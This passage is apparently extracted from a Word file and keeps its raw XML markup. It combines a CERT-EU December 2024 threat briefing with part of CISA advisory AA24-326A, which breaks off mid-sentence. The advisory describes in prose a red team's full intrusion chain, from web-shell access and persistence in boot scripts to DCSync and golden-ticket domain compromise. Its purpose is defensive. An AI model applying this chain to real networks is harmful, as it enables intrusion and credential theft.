disguised as academic certificates. The flaw, triggered through actions like right-clicking or moving the file, allows attackers to deploy SparkRAT malware for remote access, with CERT-UA attributing the campaign to suspected Russian threat actor UAC-0194. Microsoft has issued a patch to address the issue. russia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Information stealers malware campaign targets Swiss civilians via fake MeteoSwiss letters On November 14, the Switzerland's NCSC reported on fraudulent letters claiming to be from MeteoSwiss and urging recipients to download a fake severe weather app via a QR code, installing the Android malware "Coper." The fake app mimics the Alertswiss app to steal sensitive data from over 383 apps, including e-banking. The real Alertswiss app, used for official alerts, has a distinct round logo. Only Android devices are affected. android malware Cybercrime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Hungary confirms cyberattack on Defence Procurement Agency On November 14, Hungary's government confirmed that the Defence Procurement Agency's IT systems were breached by a foreign threat actor, though no sensitive military structure data was compromised. While an investigation is ongoing, reports suggest the INC Ransomware group may have been involved, accessing procurement plans and encrypting files, but officials stated national security remains unaffected. defence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PXA stealer targets sensitive data in government and education sectors On November 14, Cisco researchers uncovered PXA Stealer, a python-based malware targeting sensitive information in education sector in India and government organisations in European countries, including Sweden and Denmark. Operated by a Vietnamese-speaking threat actor, the malware extracts credentials, browser data, financial information, and gaming accounts, employing obfuscated scripts and Telegram bots for data exfiltration, highlighting sophisticated cybercriminal tactics. education public administration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Likely financially motivated cyberecurity incident disrupts UK hospital On November 25, Wirral University Teaching Hospital (WUTH) in the UK disclosed a cybersecurity incident causing operational disruptions, including the cancellation of outpatient appointments and restricted access to test results and medical records at Arrowe Park Hospital. No threat actor has claimed responsibility. Similar incidents have targeted UK healthcare providers in 2024, with ransomware intrusions being the primary cause of disruptions. health</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Nokia investigates potential source code leak through third party provider On November 4, Nokia confirmed to Bleeping Computer that they opened an investigation into a potential compromise of a third party provider because a cybercrime actor Grep publicly claimed to have exfiltrated Nokia source code. Disruption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Bank of Finland advises preparedness for cyberattacks on financial institutions On November 13, the Bank of Finland advised households to keep enough cash on hand to cover three days of expenses in case of banking disruptions caused by cyberattacks, such as recent DDoS attacks that have impacted Finnish financial institutions. It also recommended maintaining accounts with multiple banks, using alternative online payment platforms, and having a backup electronic ID verification system to prepare for potential service outages. finance Data exposure and leaks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Pro-Russia threat actor breaches German Federal Statistical Office and sells company data on darknet On November 14, NZZ newspaper reported that pro-Russia threat actor Indohaxsec breached Germany's Federal Statistical Office (Destatis), stealing and listing for sale 3.8 GB of company data, including sensitive contact and login details, on the darknet. Although Destatis recently updated its Idev reporting system in August 2024, it remains unclear how the hackers accessed the system to acquire data on German firms. public administration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French hospital suffered a data breach exposing 750.000 records On November 19, a French hospital suffered a data breach, exposing 750.000 patient records through stolen credentials used to access MediBoard, an EPR system by Softway Medical Group. The company stated that the data was hosted by the hospital. The hacker, using the nickname "nears," claims to have breached multiple facilities, affecting over 1,5 million patients. health</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Financial software company Finastra suffered a data breach On November 19, Finastra, a London-based global financial software firm, reported a cybersecurity incident that occurred on November 7. An attacker accessed its Secure File Transfer Platform (SFTP) using compromised credentials. No evidence suggests the breach spread </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>beyond SFTP. Finastra's services include lending, payments, cloud banking, and trading risk management. finance World Cyber policy and law enforcement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China expands data security oversight with new regulations impacting foreign businesses On September 30, China's State Council released the Network Data Security Management Regulations, expanding national security oversight over foreign and domestic entities handling data related to Chinese individuals or organisations, effective January 1, 2025. These regulations, which require compliance with strict data localisation and transfer controls, are expected to pose operational challenges for multinational companies by necessitating dual compliance with China's data security standards and other global frameworks like the EU-GDPR. china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Chinese national indicted for trade secret theft On October 31, the US government released an indictment of a Chinese national accused of trade secret theft. The individual reportedly used a VPN to access a US-based investment management firm's network from China after which the then-employee copied sensitive information. The individual reportedly had the intention to start his own China-based investment firm. china united states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Israeli Committee advances controversial bill on digital surveillance for serious crimes On November 10, Israel's Ministerial Committee for Legislation advanced a bill allowing police to digitally surveil suspects' devices, including with spyware, in serious crime cases, pending a sealed warrant. The bill, which excludes public corruption cases, has sparked debate over privacy, with opposition from the Attorney General and Justice Ministry officials. israel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Canada orders TikTok shutdown over national risk concerns On November 6, Canada ordered TikTok to cease operations within its borders due to national security concerns over potential data risks associated with ByteDance's Canadian subsidiary. While TikTok remains accessible to Canadian users, the government cited security reviews and intelligence advice to justify the shutdown. TikTok expressed disappointment, planning to challenge the decision legally, emphasizing job losses and continued platform availability for Canadian content creators. shutdown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 releases AI safety framework for critical infrastructure On November 14, the US Department of Homeland Security (DHS) introduced the "Roles and Responsibilities Framework for Artificial Intelligence in Critical Infrastructure," providing guidance for secure AI deployment across the supply chain. Developed by the AI Safety and Security Board, it targets cloud providers, AI developers, critical infrastructure operators, and civil society groups, aiming to ensure safe AI integration in U.S. critical infrastructure systems. artificial intelligence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Interpol announces international law enforcement operation which took down 22.000 IPs On November 5, Interpol announced an international law enforcement operation which took down 22.000 malicious IP addresses. The action was part of Operation Synergia II and specifically targeted phishing, ransomware and information stealers. The international operation was a joint effort from Interpol, private sector partners and law enforcement agencies from 95 member countries. take down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Over 1.000 arrests in large scale anti-cybercrime operation Serengeti On November 26, Interpol reported that Operation Serengeti, coordinated by them and Afripol with support from the EU, resulted in 1.006 arrests across 19 African countries in September and October. The operation targeted ransomware, BEC, and online scams, dismantling 134.089 infrastructures and recovering 44 million of the 193 million US dollars stolen. Highlights include credit card fraud in Kenya, Ponzi schemes in Senegal, and forced recruitment scams in Cameroon. arrest africa Cyberespionage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Canada reports that Chinese actors conducted reconnaissance towards Indian governmental organisations throughout 2024 On October 30, the Canadian Centre for Cyber Security (CCCS) issued its National Cyber Threat Assessment 2025-2026 in which they reported that Chinese actors conducted network-reconnaissance scanning against multiple Canadian governmental organisation throughout 2024. The report detailed cyber threats associated with state adversaries China, Russia, Iran, North Korea and India. china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Chinese threat actors expand Linux focus with new WolfsBane and FireWood malware On November 21, ESET researchers revealed two Linux backdoors, WolfsBane and FireWood, linked to Chinese threat actors, including the Gelsemium group. WolfsBane, a port of Windows malware, combines stealth via rootkits with full system control capabilities, while FireWood, a broader APT tool, supports file operations, command execution, and data exfiltration, reflecting a rising trend of targeting Linux due to strengthened Windows defenses. china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Kaspersky uncovers QSC framework usage by BackdoorDiplomacy threat actor in targeted cyberespionage campaigns On November 8, Kaspersky reported that the BackdoorDiplomacy group is using the QSC framework, a modular and multi-plugin malware tool, for cyberespionage in targeted campaigns, primarily within the telecommunications sector in Asia. The QSC framework, combined with the Quarian backdoor, allows in-memory loading and execution of modules such as command shells and file managers, highlighting an evolution in the group's tactics and emphasising the importance of ongoing monitoring. china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China-based threat actors used operational relay boxes (ORBs) to attack onward targets and obfuscate On October 31, Sophos, a cybersecurity company, unveiled a five-year investigation tracking China-based groups targeting perimeter devices. Sophos associates the observed activity to Volt Typhoon, APT31 and APT41 and identified, with high confidence, exploit research and development activity being conducted in the Sichuan region. The threat actors used edge devices as operational relay boxes (ORBs) to attack onward targets and obfuscate the true origin of attacks. china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BrazenBamboo weaponizes FortiClient vulnerability to steal VPN credentials On November 15, Volexity reported that the Chinese state-affiliated threat actor BrazenBamboo exploited a zero-day vulnerability in Fortinet"s Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>VPN client, FortiClient, to steal VPN credentials via their DEEPDATA malware. This vulnerability allowed credentials to be extracted from the client's process memory. Volexity notified Fortinet of this issue on July 18, 2024. china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Typhoon's KV-Botnet targeting outdated routers after prior disruption On November 12, SecurityScorecard, a US-based cybersecurity company, reported that the Chinese state-sponsored group Volt Typhoon has resumed its KV-Botnet operations, compromising outdated Cisco and Netgear routers with MIPS-based malware and webshells to establish covert communication channels after a prior disruption by US authorities in January. china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Singtel discloses June 2024 breach linked to China-linked Volt Typhoon threat actor On November 5, Singtel, Singapore's largest mobile carrier, disclosed a June 2024 breach potentially tied to China-linked actor Volt Typhoon, stating no data loss or service impact occurred. The breach is suspected to have served as a trial for further targeting of U.S. telecoms, with attackers reportedly using a webshell to intercept credentials and establish persistent access. china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China-linked threat actor Liminal Panda targets telecom networks with SIGTRAN and GSM exploits On November 19, CrowdStrike reported about a China-linked cyber espionage group, Liminal Panda, targeting telecommunications networks in South Asia and Africa since 2020. Leveraging custom tools like SIGTRANslator, PingPong and CordScan, the group exploits telecommunication protocols to access subscriber data, call metadata, and SMS, while also infiltrating core infrastructure through weak passwords and the interconnected nature of telecom providers' systems. china telecommunications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China-linked threat actor Salt Typhoon cyberespionage campaign targets telecommunications sector On November 15, The Wall Street Journal reported that T-Mobile confirmed having been targeted within an ongoing industry-wide cyberespionage campaign against the telecommunications sector. While T-Mobile claims no evidence of customer data compromise, other companies, including AT&amp;T and Verizon, reported data exfiltration by Salt Typhoon, including call logs and messages. Reports confirm Salt Typhoon also accessed US law enforcement wiretap systems for months, with the campaign first reported in September. china telecommunications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NSO Group exploits WhatsApp zero day to deploy Pegasus spyware despite lawsuits According to court documents filed on November 7, Israeli firm NSO Group exploited multiple zero-day exploits, including "Erised," an unknown one affecting WhatsApp to deploy Pegasus spyware in zero-click attacks, despite lawsuits. NSO developed custom clients to bypass WhatsApp protections and targeted thousands of devices globally. Pegasus enabled clients to surveil targets with minimal input. WhatsApp and Apple sued NSO, and the US sanctioned the group in 2021. psoa Cybercrime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Fake AI tools spread malware to steal credentials and cryptocurrency On November 15, researchers reported about cybercriminals distributing fake AI image and video tools to infect Windows with Lumma Stealer and macOS with AMOS malware. Both steal cryptocurrency wallets, credentials, cookies, passwords, and browsing data from major browsers like Chrome and Edge. Collected data is archived and sent to attackers for use in future exploits or sale on cybercrime markets. artificial intelligence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New Ymir ransomware partners with RustyStealer in sophisticated cyber attacks On November 11, Kaspersky revealed the emergence of Ymir, a new ransomware targeting systems previously compromised by RustyStealer, a credential- harvesting malware, marking a partnership in cybercrime for lateral movement and network infiltration. Ymir operates in-memory and uses the ChaCha20 cipher for file encryption, with Kaspersky warning that its use of information stealers could quickly make this new ransomware family a widespread threat.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BianLian ransomware shifts to exclusive data theft extortion On November 21, CISA, the FBI, and the Australian Cyber Security Centre reported that the BianLian ransomware group has transitioned fully to data theft extortion, abandoning file encryption tactics since January 2024. Operating primarily from Russia, the group employs advanced techniques like privilege escalation, SOCKS5 tunneling, and PowerShell scripting, targeting Windows and ESXi systems, and pressuring victims through ransom notes, direct calls, and dark web extortion.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Critical Veeam Backup vulnerability exploited in the wild by Frag ransomware On November 8, Sophos reported that a critical Veeam Backup &amp; Replication (VBR) vulnerability, CVE-2024-40711, is being exploited by Frag ransomware, following its previous use in Akira and Fog ransomware attacks. Threat actors exploited the flaw to gain remote code execution on unpatched VBR servers, using stolen VPN credentials to establish accounts for lateral movement. Agger Labs noted that Frag operators heavily leverage Living Off The Land binaries, complicating detection efforts.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Firefox and Windows zero-days exploited by RomCom hackers On November 26, BleepingComputer reported that the Russian-based RomCom cybercrime group exploited two zero-day vulnerabilities, CVE-2024-9680 in Firefox and CVE-2024-49039 in Windows Task Scheduler, to target users across Europe and North America. The attacks leveraged a zero-day chain exploit to deliver the RomCom backdoor via malicious websites. This widespread campaign impacted multiple industries, including government, defense, and energy, and highlights RomCom's advanced capabilities and espionage focus. Significant vulnerabilities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Critical Vulnerability in 7-Zip. A severe security flaw in the 7-Zip file compression utility allows remote attackers to execute malicious code through specially crafted archives. This vulnerability, tracked as CVE-2024- 11477, has a CVSS score of 7,8. See CERT-EU's SA 2024-118.</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Zero-Day Vulnerabilities in Palo Alto Networks PAN-OS. Palo Alto Networks released updates for two actively exploited zero-day vulnerabilities in PAN- OS. Exploitation could permit a remote unauthenticated attacker to gain administrator privileges or enable a PAN-OS administrator to perform actions on the firewall with root privileges. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Users are advised to apply updates and restrict management web interface access to trusted internal IP addresses. See CERT-EU's SA 2024-117.</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Microsoft November 2024 Patch Tuesday. Microsoft's November 2024 Patch Tuesday addressed 91 vulnerabilities, including four zero-day vulnerabilities. Notably, CVE-2024-43451 (NTLM Hash Disclosure Spoofing) and CVE-2024-49039 (Windows Task Scheduler Elevation of Privilege) have been actively exploited, potentially allowing attackers to gain unauthorized access or escalate privileges with minimal user interaction or crafted applications. See CERT-EU's SA 2024-116.</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All CERT-EU's Security Advisories are available to the public on CERT-EU's website, https://www.cert.europa.eu/publications/security-advisories/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Conclusions or attributions made in this document merely reflect what publicly available sources report. They do not reflect our stance. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>↩</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CERT-EU 2024.12.03 14:43</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://cert.europa.eu/publications/threat-intelligence/cb24-12/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Enhancing Cyber Resilience: Insights from CISA Red Team Assessment of a US Critical Infrastructure Sector Organization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Release Date November 21, 2024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Alert Code AA24-326A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EXECUTIVE SUMMARY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Cybersecurity and Infrastructure Security Agency (CISA) conducted a red team assessment (RTA) at the request of a critical infrastructure organization. During RTAs, CISA's red team simulates real-world malicious cyber operations to assess an organization's cybersecurity detection and response capabilities. In coordination with the assessed organization, CISA is releasing this Cybersecurity Advisory to detail the red team's activity- including their tactics, techniques, and procedures (TTPs) and associated network defense activity. Additionally, the advisory contains lessons learned and key findings from the assessment to provide recommendations to network defenders and software manufacturers for improving their organizations' and customers' cybersecurity posture.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Within this assessment, the red team (also referred to as 'the team') gained initial access through a web shell left from a third party's previous security assessment. The red team proceeded to move through the demilitarized zone (DMZ) and into the network to fully compromise the organization's domain and several sensitive business system (SBS) targets. The assessed organization discovered evidence of the red team's initial activity but failed to act promptly regarding the malicious network traffic through its DMZ or challenge much of the red team's presence in the organization's Windows environment.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red team was able to compromise the domain and SBSs of the organization as it lacked sufficient controls to detect and respond to their activities. The red team's findings illuminate lessons learned for network defenders and software manufacturers about how to respond to and reduce risk. Lesson Learned: The assessed organization had insufficient technical controls to prevent and detect malicious activity. The organization relied too heavily on host-based endpoint detection and response (EDR) solutions and did not implement sufficient network layer protections.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Lesson Learned: The organization's staff require continuous training, support, and resources to implement secure software configurations and detect malicious activity. Staff need to continuously enhance their technical competency, gain additional institutional knowledge of their systems, and ensure they are provided sufficient resources by management to have the conditions to succeed in protecting their networks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Lesson Learned: The organization's leadership minimized the business risk of known attack vectors for the organization. Leadership deprioritized the treatment of a vulnerability their own cybersecurity team identified, and in their risk-based decision-making, miscalculated the potential impact and likelihood of its exploitation.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 reduce risk of similar malicious cyber activity, CISA encourages critical infrastructure organizations to apply the recommendations in the Mitigations section of this advisory to ensure security processes and procedures are up to date, effective, and enable timely detection and mitigation of malicious activity.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document illustrates the outsized burden and costs of compensating for insecure software and hardware borne by critical infrastructure owners and operators. The expectation that owners and operators should maintain the requisite sophisticated cyber defense skills creates undue risk. Technology manufacturers must assume responsibility for product security. Recognizing that insecure software contributes to these identified issues, CISA urges software manufacturers to embrace Secure by Design principles and implement the recommendations in the Mitigations section of this advisory, including those listed below: Embed security into product architecture throughout the entire software development lifecycle (SDLC).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Eliminate default passwords.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mandate MFA, ideally phishing-resistant MFA, for privileged users and make MFA a default, rather than opt-in, feature.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Download the PDF version of this report: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AA24-326A Enhancing Cyber Resilience: Insights from CISA Red Team Assessment of a U.S. Critical Infrastructure Sector Organization (PDF, 823.56 KB ) INTRODUCTION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CISA has authority to-upon request-provide analyses, expertise, and other technical assistance to critical infrastructure owners and operators and provide operational and timely technical assistance to federal and non- federal entities with respect to cybersecurity risks. (See generally 6 U.S.C. SSSS 652[c][5], 659[c][6]). The target organization for this assessment was a critical infrastructure organization in the United States. After receiving a request for an RTA from the organization and coordinating the high-level details of the engagement, CISA conducted the RTA over approximately a three-month period.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During RTAs, a CISA red team simulates real-world threat actors to assess an organization's cybersecurity detection and response capabilities. During Phase I, the red team attempts to gain and maintain persistent access to an organization's enterprise network, avoid detection, evade defenses, and access SBSs. During Phase II, the red team attempts to trigger a security response from the organization's people, processes, and/or technology.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Drafted in coordination with the assessed organization, this advisory details the red team's activity and TTPs, associated network defense activity, and lessons learned to provide network defenders with recommendations for improving an organization's cybersecurity posture. The advisory also provides recommendations for software manufacturers to harden their customer networks against malicious activity and reduce the likelihood of domain compromise. TECHNICAL DETAILS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Note: This advisory uses the MITRE ATT&amp;CK(R) Matrix for Enterprise framework, version 16. See Appendix: MITRE ATT&amp;CK Tactics and Techniques for a table of the red team's activity mapped to MITRE ATT&amp;CK tactics and techniques. Phase I: Red Team Cyber Threat Activity Overview</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CISA red team operated without prior knowledge of the organization's technology assets and began the assessment by conducting open source research on the target organization to gain information about its network [T1590], defensive tools [T1590.006], and employees [T1589.003]. The red team designed spearphishing campaigns [T1566] tailored to employees most likely to communicate with external parties. The phishing attempts were ultimately unsuccessful-targets ran the payloads [T1204], but their execution did not result in the red team gaining access into the network.</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the failed spearphishing campaigns, the red team continued external reconnaissance of the network [T1595] and discovered a web shell [T1505.003] left from a previous Vulnerability Disclosure Program (VDP). The red team used this for initial access [TA0001] and immediately reported it to the organization's trusted agents (TAs). The red team leveraged that access to escalate privileges [TA0004] on the host, discover credential material on a misconfigured Network File System (NFS) share [T1552.001], and move from a DMZ to the internal network [TA0008].</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access to the internal network, the red team gained further access to several SBSs. The red team leveraged a certificate for client authentication [T1649] they discovered on the NFS share to compromise a system configured for Unconstrained Delegation. This allowed the red team to acquire a ticket granting ticket (TGT) for a domain controller [T1558.001], used to further compromise the domain. The red team leveraged this level of access to exploit SBS targets provided by the organization's TAs.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assessed organization detected much of the red team's activity in their Linux infrastructure after CISA alerted them via other channels to the vulnerability the red team used for initial access. Once given an official notification of a vulnerability, the organization's network defenders began mitigating the vulnerability. Network defenders removed the site hosting the web shell from the public internet but did not take the server itself offline. A week later, network defenders officially declared an incident once they determined the web shell was used to breach the internal network. For several weeks, network defenders terminated much of the red team's access until the team maintained implants on only four hosts. Network defenders successfully delayed the red team from accessing many SBSs that required additional positioning, forcing the red team to spend time refortifying their access in the network. Despite these actions, the red team was still able to access a subset of SBSs. Eventually, the red team and TAs decided that the network defenders would stand down to allow the red team to continue its operations in a monitoring mode. In monitoring mode, network defenders would report what they observed of the red team's access, but not continue to block and terminate it.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See Figure 1 for a timeline of the red team's activity with key points access. See the following sections for additional details, including the red team's TTPs.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 Timeline of Red Team Cyber Threat Activity Initial Access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Following an unsuccessful spearphishing campaign, the red team gained initial access to the target by exploiting an internet-facing Linux web server [T1190] discovered through reconnaissance [TA0043] of the organization's external internet protocol (IP) space [T1590.005].</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The red team first conducted open source research [T1593] to identify information about the organization's network, including the tools used to protect the network and potential targets for spearphishing. The red team looked for email addresses [T1589.002] and names to infer email addresses from the organization's email syntax (discovered during reconnaissance). Following this action, the red team sent tailored spearphishing emails to 13 targets [T1566.002]. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Of these 13 targets, one user responded and executed two malicious payloads [T1204.002]. However, the payloads failed to bypass a previously undiscovered technical control employed by the victim organization, preventing the red team's first attempt to gain initial access.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 find an alternate pathway for initial access, the red team conducted reconnaissance with several publicly available tools, such as Shodan and Censys, to discover accessible devices and services on the internet [T1596.005]. The red team identified an old and unpatched service with a known XML External Entity (XXE) vulnerability and leveraged a public proof of concept to deploy a web shell. The associated product had an exposed endpoint-one that system administrators should typically block from the public internet-that allowed the red team to discover a preexisting web shell on the organization's Linux web server. The preexisting web shell allowed the red team to run arbitrary commands on the server [T1059] as a user (WEBUSER1). Using the web shell, the red team identified an open internal proxy server [T1016] to send outbound communications to the internet via Hypertext Transfer Protocol Secure (HTTPS). The red team then downloaded [T1105] and executed a Sliver payload that utilized this proxy to establish command and control (C2) over this host, calling back to their infrastructure [TA0011].</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Note: Because the web shell and unpatched vulnerability allowed actors to easily gain initial access to the organization, the CISA red team determined this was a critical vulnerability. CISA reported both the vulnerability and the web shell to the organization in an official vulnerability notification so the organization could remediate both issues. Following this notification, the victim organization initiated threat hunting activities, detecting some of the red team's activity. The TAs determined that network defenders had previously identified and reported the vulnerability but did not remediate it. Further, the TAs found that network defenders were unaware of the web shell and believed it was likely leftover from prior VDP activity. See the Defense Evasion and Victim Network Defense Activities section for more information. Linux Infrastructure Compromise Local Privilege Escalation and Credential Access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red team then moved laterally from the web server to the organization's internal network using valid accounts [T1078] as the DMZ was not properly segmented from the organization's internal domain.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red team acquired credentials [TA0006] by first escalating privileges on the web server. The team discovered that WEBUSER1 had excessive sudo rights, allowing them to run some commands as root commands without a password. They used these elevated rights to deploy a new callback with root access [T1548.003].</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root access to the web server, the team had full access to the organization's directories and files on a NFS share with no_root_squash enabled. If no_root_squash is used, remote root users can read and change any file on the shared file system and leave a trojan horse [T1080] for other users to inadvertently execute. On Linux operating systems this option is disabled by default, yet the organization enabled it to accommodate several legacy systems. The organization's decision to enable the no_root_squash option allowed the red team to read all the files on the NFS share once it escalated its privileges on a single host with the NFS share mounted. This NFS share hosted the home directories of hundreds of Linux users-many of which had privileged access to one or more servers-and was auto-mounted when those users logged into Linux hosts in the environment.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red team used its escalated privileges to search for private certificate files, Secure Shell (SSH) private keys, passwords, bash command histories [T1552.003], and other sensitive data across all user files on the NFS share [T1039]. The team initially obtained 61 private SSH keys [T1552.004] and a file containing valid cleartext domain credentials (DOMAINUSER1) that the team used to authenticate to the organization's domain [T1078.002]. Linux Command and Control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organization's Linux environment, the red team leveraged HTTPS connections for C2 [T1071.001]. Most of the Linux systems could not directly access the internet, but the red team circumvented this by leveraging an open internal HTTPS proxy [T1090.001] for their traffic. Lateral Movement and Persistence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red team's acquisition of SSH private keys generated for user and service accounts facilitated unrestricted lateral movement to other Linux hosts [T1021.004]. This acquisition included two highly privileged accounts with root access to hundreds of servers. Within one week of initial access, the team moved to multiple Linux servers and established persistence [TA0003] on four. The team used a different persistence mechanism on each Linux host, so network defenders would be less likely to discover the red team's presence on all four hosts. The team temporarily backdoored several scripts run at boot time to maintain persistence [T1037], ensuring the original versions of the scripts were re-enabled once the team successfully achieved persistence. Some of the team's techniques included modifying preexisting scripts run by the cron utility [T1053.003] and ifup-post scripts [T1037.003].</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Of note, the team gained root access to an SBS-adjacent infrastructure management server that ran Ansible Tower. Access to this Ansible Tower system [T1072] provided easy access to multiple SBSs. The team discovered a root SSH private key on the host, which allowed the team to move to six SBSs across six different sensitive IP ranges. A week after the team provided screenshots of root access to the SBSs to the TAs, the TAs deconflicted the red team's access to the Ansible Tower system that network defenders discovered. The organization detected the compromise by observing abnormal usage of the root SSH private key. The root SSH private key was used to log into multiple hosts at times and for durations outside of preestablished baselines. In a real compromise, the organization would have had to shut down the server, significantly impacting business operations. Windows Domain Controller Compromise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Approximately two weeks after gaining initial access, the red team compromised a Windows domain controller. This compromise allowed the team to move laterally to all domain-joined Windows hosts within the organization.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To first gain situational awareness about the organization's environment, the red team exfiltrated Active Directory (AD) information [TA0010] from a compromised Linux host that had network access to a Domain Controller (DC). The team queried Lightweight Directory Access Protocol (Over SSL)-(LDAPS)- to collect information about users [T1087.002], computers [T1018], groups [T1069.002], access control lists (ACL), organizational units (OU), and group policy objects (GPO) [T1615]. Unfortunately, the organization did not have detections to monitor for anomalous LDAP traffic. A non-privileged user querying LDAP from the organization's Linux domain should have alerted network defenders.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red team observed a total of 42 hosts in AD that were not DCs, but had Unconstrained Delegation enabled. Hosts with Unconstrained Delegation enabled store the Kerberos TGTs of any user that authenticates to them. With sufficient privileges, an actor can obtain those tickets and impersonate associated users. A compromise of any of these hosts could lead to the escalation of privileges within the domain. Network defenders should work with system administrators to determine whether Unconstrained Delegation is necessary for their systems and limit the number of systems with Unconstrained Delegation unnecessarily enabled.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red team observed insufficient network segmentation between the organization's Linux and Windows domains. This allowed for Server Message Block (SMB) and Kerberos traffic to a DC and a domain server with Unconstrained Delegation enabled (UDHOST). The team discovered an unprotected Personal Information Exchange (.pfx) file on the NFS home share that they believed was for UDHOST based on its naming convention.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Equipped with the .pfx file, the red team used Rubeus-an open source toolset for Kerberos interaction and abuses-to acquire a TGT and New Technology Local Area Network Manager (NTLM) hash for UDHOST from the DC. The team then used the TGT to abuse the Server-for-User-to-Self (S4U2Self) Kerberos extension to gain administrative access to UDHOST.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red team leveraged this administrative access to upload a modified version of Rubeus in monitor mode to capture incoming tickets [T1040] on UDHOST with Rubeus' /monitor command. Next, the team ran DFSCoerce.py to force the domain controller to authenticate to UDHOST [T1187]. The team then downloaded the captured tickets from UDHOST.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the DC's TGT, the team used Domain Controller Sync (DCSync) through their Linux tunnels to acquire the hash of several privileged accounts- including domain, enterprise, and server administrators-and the critical krbtgt account [T1003.006]. Gaining access to AD is not unusual for most of CISA's Red Team engagements, but it is rare to find network defenders who can secure and monitor it quickly and effectively.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Once the team harvested the credentials needed, they moved laterally to nearly any system in the Windows domain (see Figure 2) through the following steps (hereafter, this combination of techniques is referred to as the "Preferred Lateral Movement Technique"): The team either forged a golden ticket using the krbtgt hash or requested a valid TGT using the hashes they exfiltrated for a specific account before loading the ticket into their session for additional authentication. The team dropped an inflated Dynamic Link Library (DLL) file associated with legitimate scheduled tasks on the organization's domain.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
